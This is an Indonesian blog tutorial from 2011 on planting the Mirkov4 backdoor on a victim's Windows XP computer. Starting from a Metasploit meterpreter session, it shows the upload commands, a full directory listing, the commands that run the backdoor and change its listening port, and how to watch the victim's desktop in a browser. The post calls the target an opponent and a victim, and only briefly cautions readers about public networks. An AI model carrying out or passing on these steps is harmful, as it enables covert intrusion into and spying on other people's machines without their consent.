pendahuluan.
ini adalah artikel tentang bagaimana menanamkan trojan / backdoor di dalam sistem operasi lawan
untuk itu sangat di harapkan kepada sahabat-sahabat yang sering berselancar di internet
baik itu di warnet-warnet maupun di jaringan wifi-wifi agar lebih berhati-hati :)
no system perfect..no patch 4 human stupidity..hee...
kembali dalam hal ini yang menjadi target adalah windows (khususnya XP), & seluruh turunannya...:p
tentang Mirkov4 :
Mirkov4 adalah alat administrasi remote yang beroperasi melalui http. sistem kerjanya
sama persis dengan shell / backdor yang sering di gunakan di web attacking, namun ada beberapa hal yang lebih
yaitu kemampuan untuk mengawasi & memata-matai aktifitas dekstop lawan hanya dengan web browser.
mirk0v4 di tulis dengan menggunakan bahasa Microsoft Visual C++. hhhhhhhhhhmmmmmmmmmm,,,,,,,
sederhananya cara kerja tools ini yaitu dengan membuka kan kita port untuk meng-akses computer lawan.
Persiapan / tools :
1. sistem operasi : linux (backtrack, backbox, blackbuntu, gnacktrack) atau yang sejenisnya.
2. metasploit
3. mirkov4
4. victim : saya memilih victim windows XP SP 2. (silahkan di coba pada turunan-turunan lainnya)
pertama :
exploitasi victim menggunakan metasploit
saya anggap sahabat-sahabat sudah mengerti tentang hal ini.:)
kita hanya membutuhkan meterpreter shell di computer lawan.
mirkov4 sudah include di dalam OS-OS yang saya sebutkan di atas
letaknya ada di /pentest/windows-binaries/misc/
tinggal di extract saja..(biar lbh mudah extract di desktop,,
lanjut
jika sudah mendapatkan akses meterpreter, upload file mirkov4
meterpreter > upload /home/yur4kh4/Desktop/mirkov4.exe C:\\windows
[*] uploading : /home/yur4kh4/Desktop/mirkov4.exe -> C:\windows
[*] uploaded : /home/yur4kh4/Desktop/mirkov4.exe -> C:\windows\mirkov4.exe
meterpreter > cd windows
meterpreter > ls
Listing: C:\windows
===================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir Wed Mar 30 10:02:23 +0700 2011 .
40777/rwxrwxrwx 0 dir Tue Jan 01 00:00:00 +0700 1980 ..
100666/rw-rw-rw- 0 fil Wed Mar 30 11:22:16 +0700 2011 0.log
40777/rwxrwxrwx 0 dir Fri Feb 11 15:38:02 +0700 2011 AppPatch
100666/rw-rw-rw- 1272 fil Wed Aug 04 19:00:00 +0700 2004 Blue Lace 16.bmp
100666/rw-rw-rw- 17062 fil Wed Aug 04 19:00:00 +0700 2004 Coffee Bean.bmp
40777/rwxrwxrwx 0 dir Fri Feb 11 15:34:24 +0700 2011 Config
40777/rwxrwxrwx 0 dir Fri Feb 11 15:34:24 +0700 2011 Connection Wizard
40777/rwxrwxrwx 0 dir Fri Feb 11 08:44:46 +0700 2011 Cursors
40777/rwxrwxrwx 0 dir Fri Feb 11 15:38:58 +0700 2011 Debug
40777/rwxrwxrwx 0 dir Fri Feb 11 08:46:30 +0700 2011 Downloaded Program Files
40777/rwxrwxrwx 0 dir Fri Feb 11 15:34:24 +0700 2011 Driver Cache
100666/rw-rw-rw- 133 fil Fri Feb 11 08:44:56 +0700 2011 DtcInstall.log
100666/rw-rw-rw- 22588 fil Mon Feb 14 12:43:28 +0700 2011 FaxSetup.log
100666/rw-rw-rw- 16730 fil Wed Aug 04 19:00:00 +0700 2004 FeatherTexture.bmp
40555/r-xr-xr-x 0 dir Sun Feb 20 00:44:31 +0700 2011 Fonts
100666/rw-rw-rw- 17336 fil Wed Aug 04 19:00:00 +0700 2004 Gone Fishing.bmp
100666/rw-rw-rw- 26582 fil Wed Aug 04 19:00:00 +0700 2004 Greenstone.bmp
40777/rwxrwxrwx 0 dir Fri Feb 11 08:45:51 +0700 2011 Help
40777/rwxrwxrwx 0 dir Tue Mar 29 13:24:28 +0700 2011 Installer
100666/rw-rw-rw- 2694 fil Mon Feb 14 12:43:28 +0700 2011 MedCtrOC.log
40777/rwxrwxrwx 0 dir Fri Feb 11 15:37:57 +0700 2011 Media
40777/rwxrwxrwx 0 dir Fri Mar 25 07:07:22 +0700 2011 Minidump
100777/rwxrwxrwx 69120 fil Wed Aug 04 19:00:00 +0700 2004 NOTEPAD.EXE
100666/rw-rw-rw- 4161 fil Fri Feb 11 08:47:39 +0700 2011 ODBCINST.INI
100666/rw-rw-rw- 833 fil Fri Feb 11 08:53:25 +0700 2011 OEWABLog.txt
40555/r-xr-xr-x 0 dir Fri Feb 11 08:46:30 +0700 2011 Offline Web Pages
40777/rwxrwxrwx 0 dir Fri Feb 11 15:37:52 +0700 2011 PeerNet
100666/rw-rw-rw- 65954 fil Wed Aug 04 19:00:00 +0700 2004 Prairie Wind.bmp
40777/rwxrwxrwx 0 dir Wed Mar 30 11:29:47 +0700 2011 Prefetch
40777/rwxrwxrwx 0 dir Fri Feb 11 15:34:24 +0700 2011 Provisioning
100666/rw-rw-rw- 8192 fil Fri Feb 11 08:51:59 +0700 2011 REGLOCS.OLD
40777/rwxrwxrwx 0 dir Fri Feb 11 08:47:34 +0700 2011 Registration
40777/rwxrwxrwx 0 dir Fri Feb 11 15:34:24 +0700 2011 Resources
100666/rw-rw-rw- 17362 fil Wed Aug 04 19:00:00 +0700 2004 Rhododendron.bmp
100666/rw-rw-rw- 26680 fil Wed Aug 04 19:00:00 +0700 2004 River Sumida.bmp
100444/r--r--r-- 1042903 fil Wed Aug 04 19:00:00 +0700 2004 SET3.tmp
100444/r--r--r-- 1086058 fil Wed Aug 04 19:00:00 +0700 2004 SET4.tmp
100444/r--r--r-- 13753 fil Wed Aug 04 19:00:00 +0700 2004 SET8.tmp
40777/rwxrwxrwx 0 dir Sun Feb 20 00:45:27 +0700 2011 SHELLNEW
100666/rw-rw-rw- 65832 fil Wed Aug 04 19:00:00 +0700 2004 Santa Fe Stucco.bmp
100666/rw-rw-rw- 13926 fil Wed Mar 30 10:27:02 +0700 2011 SchedLgU.Txt
100666/rw-rw-rw- 65978 fil Wed Aug 04 19:00:00 +0700 2004 Soap Bubbles.bmp
40777/rwxrwxrwx 0 dir Fri Feb 11 08:53:08 +0700 2011 SoftwareDistribution
100666/rw-rw-rw- 0 fil Fri Feb 11 15:41:33 +0700 2011 Sti_Trace.log
100777/rwxrwxrwx 15360 fil Wed Aug 04 19:00:00 +0700 2004 TASKMAN.EXE
40777/rwxrwxrwx 0 dir Fri Feb 11 08:52:10 +0700 2011 Tasks
40777/rwxrwxrwx 0 dir Tue Mar 29 12:51:46 +0700 2011 Temp
100666/rw-rw-rw- 316640 fil Fri Feb 11 08:47:47 +0700 2011 WMSysPr9.prx
40555/r-xr-xr-x 0 dir Fri Feb 11 08:46:32 +0700 2011 Web
40777/rwxrwxrwx 0 dir Tue Mar 22 15:52:43 +0700 2011 WinSxS
100444/r--r--r-- 749 fil Fri Feb 11 08:46:23 +0700 2011 WindowsShell.Manifest
100666/rw-rw-rw- 146382 fil Wed Mar 30 11:28:01 +0700 2011 WindowsUpdate.log
100666/rw-rw-rw- 9522 fil Wed Aug 04 19:00:00 +0700 2004 Zapotec.bmp
100666/rw-rw-rw- 707 fil Wed Aug 04 19:00:00 +0700 2004 _default.pif
40777/rwxrwxrwx 0 dir Fri Feb 11 15:34:24 +0700 2011 addins
100666/rw-rw-rw- 2048 fil Wed Mar 30 11:21:55 +0700 2011 bootstat.dat
100666/rw-rw-rw- 82944 fil Wed Aug 04 19:00:00 +0700 2004 clock.avi
100666/rw-rw-rw- 200 fil Fri Feb 11 08:43:54 +0700 2011 cmsetacl.log
100666/rw-rw-rw- 20120 fil Mon Feb 14 12:43:29 +0700 2011 comsetup.log
100666/rw-rw-rw- 0 fil Fri Feb 11 08:47:57 +0700 2011 control.ini
100666/rw-rw-rw- 2 fil Wed Aug 04 19:00:00 +0700 2004 desktop.ini
40777/rwxrwxrwx 0 dir Fri Feb 11 15:37:57 +0700 2011 ehome
100777/rwxrwxrwx 1032192 fil Wed Aug 04 19:00:00 +0700 2004 explorer.exe
100666/rw-rw-rw- 80 fil Wed Aug 04 19:00:00 +0700 2004 explorer.scf
100777/rwxrwxrwx 10752 fil Wed Aug 04 19:00:00 +0700 2004 hh.exe
100666/rw-rw-rw- 87547 fil Mon Feb 14 12:43:29 +0700 2011 iis6.log
40777/rwxrwxrwx 0 dir Fri Feb 11 08:48:23 +0700 2011 ime
100666/rw-rw-rw- 4382 fil Fri Feb 11 08:51:19 +0700 2011 imsins.BAK
100666/rw-rw-rw- 4696 fil Mon Feb 14 12:43:29 +0700 2011 imsins.log
40777/rwxrwxrwx 0 dir Tue Mar 29 13:24:24 +0700 2011 inf
40777/rwxrwxrwx 0 dir Fri Feb 11 15:34:24 +0700 2011 java
100777/rwxrwxrwx 94208 fil Wed Mar 30 11:34:39 +0700 2011 mirkov4.exe
40777/rwxrwxrwx 0 dir Fri Feb 11 15:37:43 +0700 2011 msagent
40777/rwxrwxrwx 0 dir Fri Feb 11 15:34:24 +0700 2011 msapps
100666/rw-rw-rw- 1405 fil Wed Aug 04 19:00:00 +0700 2004 msdfmap.ini
100666/rw-rw-rw- 1748 fil Mon Feb 14 12:43:28 +0700 2011 msgsocm.log
100666/rw-rw-rw- 19702 fil Mon Feb 14 12:43:26 +0700 2011 msmqinst.log
40777/rwxrwxrwx 0 dir Fri Feb 11 15:37:57 +0700 2011 mui
100666/rw-rw-rw- 4951 fil Mon Feb 14 12:43:27 +0700 2011 netfxocm.log
100666/rw-rw-rw- 0 fil Wed Feb 23 12:58:25 +0700 2011 nsreg.dat
100666/rw-rw-rw- 11546 fil Mon Feb 14 12:43:29 +0700 2011 ntdtcsetup.log
100666/rw-rw-rw- 29070 fil Mon Feb 14 12:43:28 +0700 2011 ocgen.log
100666/rw-rw-rw- 1770 fil Mon Feb 14 12:43:29 +0700 2011 ocmsn.log
dan seterusnya...:)
Process 1248 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows>mirkov4.exe
mirkov4.exe
C:\windows>
dengan begitu mirkov4 sudah running di computer lawan..
secara default mirkov akan membuka port 7887
jika sahabat ingin mengganti port silahkan menjalankan mirkov4.exe [port yang di inginkan
contoh : C:\windows>mirkov4.exe 1945
sekarang tinggal akses di browser kita sajha.,
http://192.168.1.103:7887/
-----------------------------------
IP victim:port default mirkov4
demikian tutorial sederhana ini ...
semoga bisa menambah wawasan sahbat-sahabat tentang metasploit & tools-tools pendukungnya..
thankz t0 : allah, muhammad, ibu, bapak
and all my frends : n4ck0, arianom, tukulesto, t3ll0, jos_ali_joe, n4kul4, vYc0d,el-farahatz, kamtiez,rafaele,clshack,...& semua yang
tidak mungkin saya sebutkan semua disini..
special :
my luv : der4
my teacher : shofiyyul mhugna
my inspiration : linus torvalds
mohon maav atas segala kekurangan
malang 30 maret 2011
regards : yur4
Tidak ada komentar:
Posting Komentar
silahkan berkomentar...